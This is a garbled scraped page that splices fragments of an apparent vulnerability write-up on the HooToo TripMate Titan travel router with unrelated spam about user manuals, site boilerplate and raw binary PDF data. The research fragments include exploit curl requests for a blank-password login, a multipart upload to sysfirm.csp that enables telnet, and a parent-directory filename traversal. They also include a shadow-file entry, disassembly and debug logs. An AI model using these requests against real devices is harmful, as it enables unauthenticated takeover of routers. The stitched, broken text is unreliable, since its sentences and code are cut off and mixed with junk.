The form data may contain a name and filename parameters (which we didnât know yet and which looks interesting). And so on. Hi, welcome to transferlazim.com, if you intend to locate details about the handbook as well as how to mount for your needs, below we will certainly offer various other details such as, Specs, Configuration Handbook, etc. We confirmed that HooToo TripMate Titan HT-TM05 (firmware HooToo-TM05-Firmare- 2.000.080) was vulnerable to multiple critical vulnerabilities. except requests.exceptions.ConnectionError: , partial ASLR is enabled on the router, but the memory layout of, appears to be quite similar across reboots – hence the hardcoded offsets. Features . Along with them, we can also find additional memory corruption vulnerabilities: Unauthenticated Buffer Overflow in mac_table, Unauthenticated Buffer Overflow in open_forwarding. binary shares the same vulnerabilities, then it is more than likely that the routers are vulnerable as well. :13341:0:99999:7::: Set-cookie: SESSID=p41UE1ZlWl46OrDxongjZirYJ9enqPrQSrAoiwA9JDfw5; 20100000, : Successful login using a blank password, curl -i -s -k -X $’POST’ -H $’Content-Type: application/x-www-form-urlencoded’ -H $’Content-Length: 42′ -H $’Connection: close’ –data-binary $’fname=security&opt=pwdchk&. 99 “HooToo TripMate Plus” is an application software for WiFi Disk. Instead, as soon as we understand that we can pass a filename parameter, we could send the following request: Next, consider what happens if we send a POST request whose filename parameter points to a parent directory. endstream
endobj
426 0 obj
<>/Metadata 62 0 R/PageLayout/OneColumn/Pages 421 0 R/StructTreeRoot 83 0 R/Type/Catalog>>
endobj
427 0 obj
<>/ExtGState<>/Font<>/XObject<>>>/Rotate 0/StructParents 0/Type/Page>>
endobj
428 0 obj
<>stream
h�b```�ffgAd`C���!�J:I2"��_�zt����a���!���Ԏ�Ԍ���t�6��a�'���d�G�L that he exploited to reach unauthenticated remote code execution. After some reversing, we identify the cgi class, responsible for handling HTTP POST forms: : Snippet of s_cgi structure initialization, .text:004F5A64         lw    $v1, 0x28+cgi($sp), .text:004F5A68         lui   $v0, 1, .text:004F5A6C         addu   $v1, $v0, .text:004F5A70         la    $v0, loc_4F0000, .text:004F5A74         nop, .text:004F5A78         addiu  $v0, (cgi_form – 0x4F0000), .text:004F5A7C         nop, .text:004F5A80         sw    $v0, s_cgi.fct_cgi_form($v1). Last October (2017), I had a couple of evenings free during an on-site project. o�Y��v)��CfjHvJxCE�`GCGCF�D�ZG��RG�(�b������ �o�����9���Fe>�K�Fٮ �N��RaHjX�u�O+���@���AX���� �r`���20� owO�
   if not os.file.exists(useful_path): os.system(âmkdir âp %sâ % useful_path),        file = HTTP_POST[âfileâ],        fullpath = â%s/%sâ % (useful_path, file), os.system(âchmod 0700 %sâ % fullpath), thread.start_new_thread(do_firmware_update), : Pseudo python code of do_firmware_update, : Exploiting sysfirm.csp to enable telnet, $ curl -i -s -k -X $’POST’ -H $’AAAA: BBBB’ -H $’Content-Type: multipart/form-data; boundary=———-43′ –data-binary $’————43x0dx0aContent-Disposition: form-data; name=”file”; filename=”AAAA”x0dx0ax0dx0a. All rights reserved. The following curl request attempts to logon the web interface using an empty password, resulting in an error (login failed): By continuing to use the site, you agree to the use of cookies. Save my name, email, and website in this browser for the next time I comment. I think we should have a look. , by many CGI callbacks.                savesc 3 /usr/sbin/$PRGNAME $SRVNAME,                echo “$SRVNAME service start failure”. PDF user guides need Adobe Acrobat Reader for viewing and also publishing. Apple MFi certified, 100% compatible with iPhone and iPad. I recommend giving them a read. I usually hope to find nothing (it is always exciting to be in unknown territories) but this time, Google already had multiple hits: GitHub repository containing HooToo TripMate Titan research notes, https://github.com/chorankates/h4ck/tree/master/hootoo, âProtecting the digital nomadâ (blog post series, part 1 of 4), http://debugtrap.com/2017/03/19/tm06-travel-safe/, âHacking travel routers like itâs 1999â, https://ioactive.com/wp-content/uploads/2018/04/DEFCON-25-Mikhail-Sosonkin-Hacking-Travel-Routers-Like-1999-UPDATED.pdf, DefCon presentation and blog post series (part. ) , we can already change the content-type of the POST request accordingly: debug output when receiving a POST request, (httpd.c,thdatatab_alloc,1798)Allocate data 0x5af760, (httpd.c,httpd_parse_request,776)recevie length: 273, (httpd.c,httpd_parse_request_line,827)REQLINE:POST, Content-Type: multipart/form-data; boundary=——–2052049399, Content-Disposition: form-data; name=”test”, (cgi.c,cgi_tab_alloc,2148)Allocate cgi 0x0x598ab8, (httpd.c,ht_header_find,1449)Fail: Miss find, (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SCRIPT_NAME, v=protocol.csp), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=GATEWAY_INTERFACE, v=CGI/1.1), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SERVER_PROTOCOL, v=HTTP/1.1), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=REQUEST_METHOD, v=POST), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SERVER_NAME, v=10.10.10.254), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=SERVER_PORT, v=81), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=REMOTE_ADDR, v=10.10.10.1), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=REMOTE_IDENT, v=OS:[Windows]-Browser:[]), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=CONTENT_TYPE, v=multipart/form-data; boundary=——–2052049399), (cgi.c,cgienv_add_val,197)OK: cgi_add_val(n=CONTENT_LENGTH, v=95), prgcgi_main_handler begin:prgtab[0].name=protocol.csp, (cgi.c,cgi_init_parse_env,966)cgi->envlen == 0, (cgi.c,cgi_sess_start,1831)Create a new session: BjxbMS2rYcPZzBSn2srcbR37hX7dMSef3LqQuigsn5qUz, prgcgi_main_handler end:prgtab[0].name=protocol.csp, (cgi.c,cgi_tab_free,2187)Free cgi 0x0x598ab8, (ht_cgi.c,ht_cgi_do,184)Free CGI memory finish, (httpd.c,httpd_schedule,685)Socket list are empty.